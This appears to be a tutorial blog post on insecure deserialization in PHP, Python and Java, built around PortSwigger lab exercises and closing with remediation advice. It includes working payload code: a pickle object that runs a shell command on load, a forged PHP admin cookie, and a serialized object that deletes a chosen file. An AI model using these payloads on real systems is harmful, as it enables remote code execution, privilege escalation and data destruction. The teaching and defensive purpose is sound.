Insecure Deserialization - Overview, Exploitation and Remediation
Insecure deserialization is often described as one of the harder vulnerabilities to exploit, and I for one struggled to get my head around it initially. That led to this post, where I'll attempt to break down the concepts behind it and how it can be exploited, whilst also offering some advice for keeping your code secure as a developer. I'll be demonstrating some lab exercises from PortSwigger's Web Security Academy whilst trying to break down some of the jargon and provide some metaphors to illustrate the concepts.
Let's get started!
Note: I've written most of this in PHP, but it applies to multiple languages, including Ruby, Java and Python: anything that allows objects to be serialized (Python serialization is usually called "pickling", but it's the same concept).
What is Serialization? Can I Eat Them?
To understand what insecure deserialization is, and therefore how to exploit it, it's fundamental to understand what serialization is, in programming terms. When complex programs are created, often developers use objects to give a shell structure to items that get repeatedly used or altered in their code. Since these objects can have complex structures, serialization allows for them to be "flattened" into a string that contains the values of the object in a compact and streamlined format. This makes it ideal for scenarios such as writing data to files or databases, and also sending data over a network between different parts of an application. It allows the data to maintain its accuracy and transfer in a stream of bytes, whilst maintaining the values that were assigned to it.
Take the example below, whereby I've made an object for a handsome chap called Toby, a 25 year old humanoid. We define the MyObject class and give it some public properties, which we can then set later in the code. Simple enough, but if you're struggling, imagine the object itself as the shell of a car and the properties you add as the parts that make it that specific car. The shell can stay the same, but you can instantiate different internal parts to make a new car each time, without having to create a new car completely from scratch. At the end, I've printed out a dump of the object that got created and then also run the serialize function on it.
Let's see what the data looks like in both formats.
The serialized data is one long stream that contains the characteristics of the object: "O" marks an object, "s" a string and "i" an integer, each followed by its data. Comparing this to the dumped values of the object, it's evident how serializing much more complex objects than the simple one demonstrated could make the transportation and handling of data between applications easier, right? Right!
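To make the format concrete, here is a minimal Python sketch that builds a PHP-style serialized string by hand. It only handles strings, integers and booleans on an object with public properties, and the property names `name` and `age` are assumptions for illustration rather than the exact ones from the original listing.

```python
def php_serialize_value(value) -> str:
    """Serialize a str, int or bool in the style of PHP's serialize()."""
    if isinstance(value, bool):  # check bool first: bool is a subclass of int
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        # PHP records the string length in bytes, not characters
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    raise TypeError(f"unsupported type: {type(value).__name__}")


def php_serialize_object(class_name: str, properties: dict) -> str:
    """Build the O:<len>:"<class>":<count>:{...} form (public properties only)."""
    body = "".join(
        php_serialize_value(name) + php_serialize_value(value)
        for name, value in properties.items()
    )
    return f'O:{len(class_name)}:"{class_name}":{len(properties)}:{{{body}}}'


# Hypothetical property names for the "Toby" object described above
toby = php_serialize_object("MyObject", {"name": "Toby", "age": 25})
print(toby)  # O:8:"MyObject":2:{s:4:"name";s:4:"Toby";s:3:"age";i:25;}
```

Reading the output left to right: an object (`O`) whose class name is 8 bytes long, with 2 properties, each written as a name/value pair.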
Therefore, if that's serialization, then deserialization is just the process... reversed? Yes! When an object gets deserialized, it essentially gets pieced back together to its original state, which then allows the receiving application to work with it as it was originally created.
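Now you might be wondering whether public and private fields get serialized from objects. Yes, by default they do. To keep an attribute out of the serialized data you have to exclude it explicitly: in Java, that means marking the field "transient" when it is declared, while in PHP you would implement the __sleep() (or __serialize()) magic method and leave the property out.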
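Python has the same default and a similar escape hatch. As a rough sketch (the `Account` class and its fields are made up for illustration), `__getstate__` lets an object decide which attributes end up in the pickled data:

```python
import pickle


class Account:
    """Hypothetical class used only to illustrate excluding a field."""

    def __init__(self, username, password):
        self.username = username
        self.password = password

    def __getstate__(self):
        # Copy the attributes and drop the one we don't want serialized
        state = self.__dict__.copy()
        state.pop("password", None)
        return state


data = pickle.dumps(Account("toby", "hunter2"))
restored = pickle.loads(data)
print(restored.__dict__)  # {'username': 'toby'}
```

Without `__getstate__`, every attribute in the instance's `__dict__` would be written out, password included.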
But how is this Insecure?
Whoa, hold your horses! The act of serialization alone is not inherently insecure. Insecure deserialization arises when an application deserializes data that an attacker has been able to supply or tamper with, rather than the data the application intended to deserialize. Yes, that means that once again, the culprit for this vulnerability is uncontrolled and unsanitized user input. Once an attacker gets their own object into the application, it's generally going to be game over. Insecure deserialization often leads to remote code execution, which is obviously a big no-no for your website. Unlike sanitizing input fields against SQL injection or XSS, it's really hard to account for every eventuality that an attacker could pass to the deserialization function, so it's probably best to just never accept any user input that will be used in serialization or deserialization scenarios. I mean, by the time you've deserialized their input and checked that it's valid, the function that deserializes it may have already triggered whatever malicious content was inside, so it's too late then.
But how can I Identify Insecure Deserialization?
Obviously, having the source code is a massive help in identifying insecure deserialization as you can see where objects are serialized, check if they are somehow susceptible to user input and then work on manipulating them. However, it can be just as easy performing a black box test if you can identify positions where data is being serialized and passed to the back end. Understanding what serialized data looks like is key to this stage. I've broken different types of serialized data down below with accompanying code, so if you see anything like this, I hope your spider-senses start to tingle. Have a play with the code yourself, see if you can identify how changes you make affect the serialized object!
PHP Serialization Example
We looked at this one above. PHP uses serialize() and unserialize() as its native functions for performing these actions. Performing a white box test? Look for these, amongst others.
The serialized object will look like this:
Python Serialization Example
Python uses the pickle library for serialization and deserialization of data. When data gets deserialized by the pickle library, any code it triggers executes in the context of the underlying Python process. When an object in Python gets pickled (serialized), pickle calls its __reduce__ method to ask how the object should be serialized. Since __reduce__ can return either a string or a tuple of between two and six items, the first two being a callable and a tuple of arguments for it, an attacker can return a command-running function with arguments of their choosing, and pickle will call it when the data is deserialized. Let's take a look at what the data looks like. Create a quick vulnerable app with Flask using the code below.
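Stripped of the web framework, the vulnerable part of such an app boils down to something like the sketch below. The function name `handle_danger` and the URL-safe base64 transport encoding are assumptions for illustration; in a Flask app this logic would sit inside a route that reads the form field from the request.

```python
import base64
import pickle


def handle_danger(form: dict) -> str:
    """Mimics the vulnerable handler: decode the 'danger' field and unpickle it."""
    raw = base64.urlsafe_b64decode(form["danger"])
    # DANGEROUS: pickle.loads will call whatever callable the payload names,
    # before this function gets any chance to inspect the result.
    obj = pickle.loads(raw)
    return f"received {type(obj).__name__}"


# Harmless usage: a client sends an ordinary pickled dictionary
benign = base64.urlsafe_b64encode(pickle.dumps({"a": 1})).decode()
print(handle_danger({"danger": benign}))  # received dict
```

The point to notice is that there is nothing between the attacker-controlled bytes and `pickle.loads`, so any checks on `obj` afterwards come too late.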
This application receives a POST request with the danger parameter in the form of a pickled object and then uses pickle.loads to deserialize it. To generate the malicious payload, we'll use the code below to run a simple id; hostname.
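A payload generator along these lines might look like the following sketch. The class name `Payload`, the helper `build_payload` and the URL-safe base64 encoding are assumptions, not the original listing. Note that building the payload does not run the command; it only runs when something calls `pickle.loads` on the result.

```python
import base64
import os
import pickle


class Payload:
    """Hypothetical payload class: tells pickle to call os.system on load."""

    def __reduce__(self):
        # (callable, args): pickle stores a reference to os.system plus the
        # argument tuple, and calls it during deserialization.
        return (os.system, ("id; hostname",))


def build_payload() -> str:
    """Pickle the payload and encode it for transport in a form field."""
    return base64.urlsafe_b64encode(pickle.dumps(Payload())).decode()


if __name__ == "__main__":
    print(build_payload())
```

Only run the unpickling side of this against an application you own or are authorised to test.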
This creates an object like the one seen below.
Sending this to the vulnerable application results in the object getting executed on the server.
This is a small, quick and dirty example of a blind deserialization, but if it prints the result then you could well have RCE with output too!
Java Serialization Example
Java is a bit more complex as it uses a binary serialization format. Unlike, for example, PHP, it's not as easy to identify or read. However, a serialized Java object will always begin with the same bytes: ac ed in hex, or rO0 when base64 encoded. In Java, the native interface that marks a class as serializable is java.io.Serializable. Anything that gets read in using the readObject() method is a scenario whereby data is being deserialized from an InputStream, and anything written using writeObject() is a case of serialization. Let's look at a quick example. Code has been modified from some of the references given at the bottom.
When run, this code will generate a serialized object that calls the command id;hostname when it is deserialized. The serialized object, as mentioned above, will always start with rO0 if it has been base64 encoded, which is the key indicator of a serialized object in Java, so keep your eyes out.
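When black box testing, the tell-tale prefixes for the three formats covered here can be checked with a small helper. This is a heuristic sketch only: the function names are made up, the PHP pattern covers just objects and arrays, and the pickle check relies on protocol 2 and later starting with the byte 0x80 followed by the protocol number.

```python
import base64
import re

# PHP objects look like O:8:"MyObject":2:{...} and arrays like a:2:{...}
PHP_PATTERN = re.compile(rb'^(O:\d+:"[^"]+":\d+:\{|a:\d+:\{)')


def guess_format(blob: bytes):
    """Return a best guess at the serialization format, or None."""
    if blob.startswith(b"\xac\xed"):
        return "java"
    if blob.startswith(b"rO0"):
        return "java (base64)"
    if PHP_PATTERN.match(blob):
        return "php"
    if len(blob) >= 2 and blob[0] == 0x80 and 2 <= blob[1] <= 5:
        return "python pickle"
    return None


def identify(value: str):
    """Check the raw value first, then retry after base64-decoding it."""
    raw = value.encode()
    found = guess_format(raw)
    if found:
        return found
    try:
        decoded = base64.b64decode(raw, validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return None
    return guess_format(decoded)
```

For example, `identify('O:8:"MyObject":2:{s:4:"name";s:4:"Toby";s:3:"age";i:25;}')` returns `"php"`, and any cookie value beginning with `rO0` is flagged as base64-encoded Java.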
A common tool used for attacking deserialization vulnerabilities is ysoserial, which generates payloads from known gadget chains against specific targets, saving you from crafting your own classes by hand. I HIGHLY recommend checking out this link from thehackerish as I learnt an invaluable amount reading it, and they also provide a way to set up your own testing environment with free code examples!
Exploiting Insecure Deserialization - Example 1
Let's take the following example. A web application uses a cookie that contains a serialized object to check whether or not the user is an administrator and provides no checks on the integrity of the data. Our account page looks like this.
If we intercept the request, the cookie might look like the one below.
If we URL decode it then base64 decode it, we can see the attributes it holds.
Let's change the admin boolean to a 1, from a 0, then re-base64 and URL encode it and then send the request on. Just like magic, we now have access to the Administrator panel!
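The decode, edit and re-encode steps can be sketched in a few lines of Python. The cookie contents here (a `User` object with `username` and `admin` properties) are a hypothetical stand-in for the lab's cookie, not a copy of it.

```python
import base64
from urllib.parse import quote, unquote


def decode_cookie(cookie: str) -> str:
    """URL-decode, then base64-decode, the cookie value."""
    return base64.b64decode(unquote(cookie)).decode()


def encode_cookie(serialized: str) -> str:
    """Base64-encode, then URL-encode, a serialized object."""
    return quote(base64.b64encode(serialized.encode()).decode(), safe="")


# Hypothetical cookie as the application might issue it
original = encode_cookie('O:4:"User":2:{s:8:"username";s:4:"toby";s:5:"admin";b:0;}')

serialized = decode_cookie(original)
# Flip the admin boolean from 0 to 1
tampered = encode_cookie(serialized.replace('s:5:"admin";b:0;', 's:5:"admin";b:1;'))
print(decode_cookie(tampered))
# O:4:"User":2:{s:8:"username";s:4:"toby";s:5:"admin";b:1;}
```

Because a boolean is a fixed-width value, no length fields need adjusting here. Changing a string value would also mean updating its `s:<length>` prefix.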
That's one example of insecure deserialization allowing us to change the attributes of users as the object was insecurely stored in the cookie parameter! Let's take a more complex example.
Exploiting Insecure Deserialization - Example 2
Once again, we're looking at a session cookie that has been created with a serialized object. Let's assume this is a white box test, or that we've found the source code lying around in a backup file.
Toward the bottom, notice the __destruct() magic method, which calls the unlink function, meaning it will delete the file specified in $this->lock_file_path when the object is destroyed. Since we can provide an object of any type in the cookie, if we provide a valid one for the above source code, the application should accept it without checking if it's what it expects. We'll start by reconstructing the object itself, CustomTemplate, and providing a malicious value for the $lock_file_path variable. In theory, __destruct() should then run against the file we specify.
Base64 and URL encoding this and then providing it as the cookie should perform our required action and delete the specified file.
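As a sketch of how that cookie value could be assembled, the helper below builds the serialized CustomTemplate string and encodes it. The helper name and the example path are hypothetical, and it assumes lock_file_path can be supplied under its plain name. PHP encodes private and protected properties with extra NUL-delimited prefixes, which this sketch does not handle.

```python
import base64
from urllib.parse import quote


def build_custom_template_cookie(lock_file_path: str) -> str:
    """Serialize a CustomTemplate with one property, then base64 and URL encode it."""
    path_len = len(lock_file_path.encode("utf-8"))  # PHP counts bytes
    serialized = (
        'O:14:"CustomTemplate":1:'
        f'{{s:14:"lock_file_path";s:{path_len}:"{lock_file_path}";}}'
    )
    return quote(base64.b64encode(serialized.encode("utf-8")).decode(), safe="")


# Hypothetical target path, for illustration only
cookie = build_custom_template_cookie("/tmp/example.lock")
print(cookie)
```

The string length prefix is computed rather than hard-coded, since a mismatch between `s:<length>` and the actual value makes PHP's unserialize() reject the object.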
It's hard to show as it was on the Burp Web Academy instance, but it did work (promise)!
That just about wraps up these few small examples, but head over to the PortSwigger Web Security Academy labs for deserialization if you want to take on some of these challenges on your own!
Remediation - How can I avoid this happening to me?!
I'm glad you asked! As previously mentioned, one of the best things you can do is to not allow the deserialization of any type of user input. Strings, binaries, cookies... Where it's possible, someone will find a way to do it. Let's remember: attackers are often unconstrained by time. With consequences as severe as a potential remote code execution, they won't give up easily on somewhere that deserializes their input just because there are a few filters blocking their way...
"But Toby.. I can't do that, it would break my application"
If you truly must allow user input to go through the process, try implementing one or more of the following security measures in your code.
- Integrity checks! Run a digital signature check on the potentially exploitable object BEFORE it gets deserialized. Doesn't match? Doesn't get opened!
- Deserialize in a lower privileged context of the application. I don't like suggesting this, but it's at least some form of damage control.
- Review your logs! You know your site best, what users do and what's normal. If there are repeated failed deserialization attempts, hits against filters or unusual account activity, review it. See what they're trying to do and then reactively make changes.
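To illustrate the integrity-check measure from the list above, here is a minimal Python sketch that uses an HMAC (a keyed hash, standing in for the "digital signature") and refuses to deserialize anything whose tag doesn't match. The key value, function names and token layout are assumptions for illustration.

```python
import base64
import hashlib
import hmac
import pickle

# Hypothetical key: in practice this must be a long random server-side secret
SECRET_KEY = b"replace-with-a-real-server-side-secret"
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def sign(data: bytes) -> str:
    """Prefix the serialized data with its HMAC-SHA256 tag and encode it."""
    tag = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(tag + data).decode()


def verify_and_load(token: str):
    """Check the tag BEFORE deserializing; raise if it doesn't match."""
    blob = base64.urlsafe_b64decode(token)
    tag, data = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        raise ValueError("signature mismatch: refusing to deserialize")
    return pickle.loads(data)


token = sign(pickle.dumps({"user": "toby", "admin": False}))
print(verify_and_load(token))  # {'user': 'toby', 'admin': False}
```

The ordering is what matters: the check happens on the raw bytes, so a tampered object never reaches the deserializer. This only helps while the key stays secret, so it reduces the risk rather than making deserialization of user input safe in general.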
Closing Thoughts
If you've read this far, I commend you and applaud you. I hope it provided a high level overview of deserialization and how it can be used maliciously against an application, and gave food for thought about WHY you should care about it. There's a wealth of incredible information out there that delves deeper into the topic, so if it's piqued your interest, go and read some blogs from people who are far more experienced than me!
Take care and be safe out there, the internet can be a dangerous place.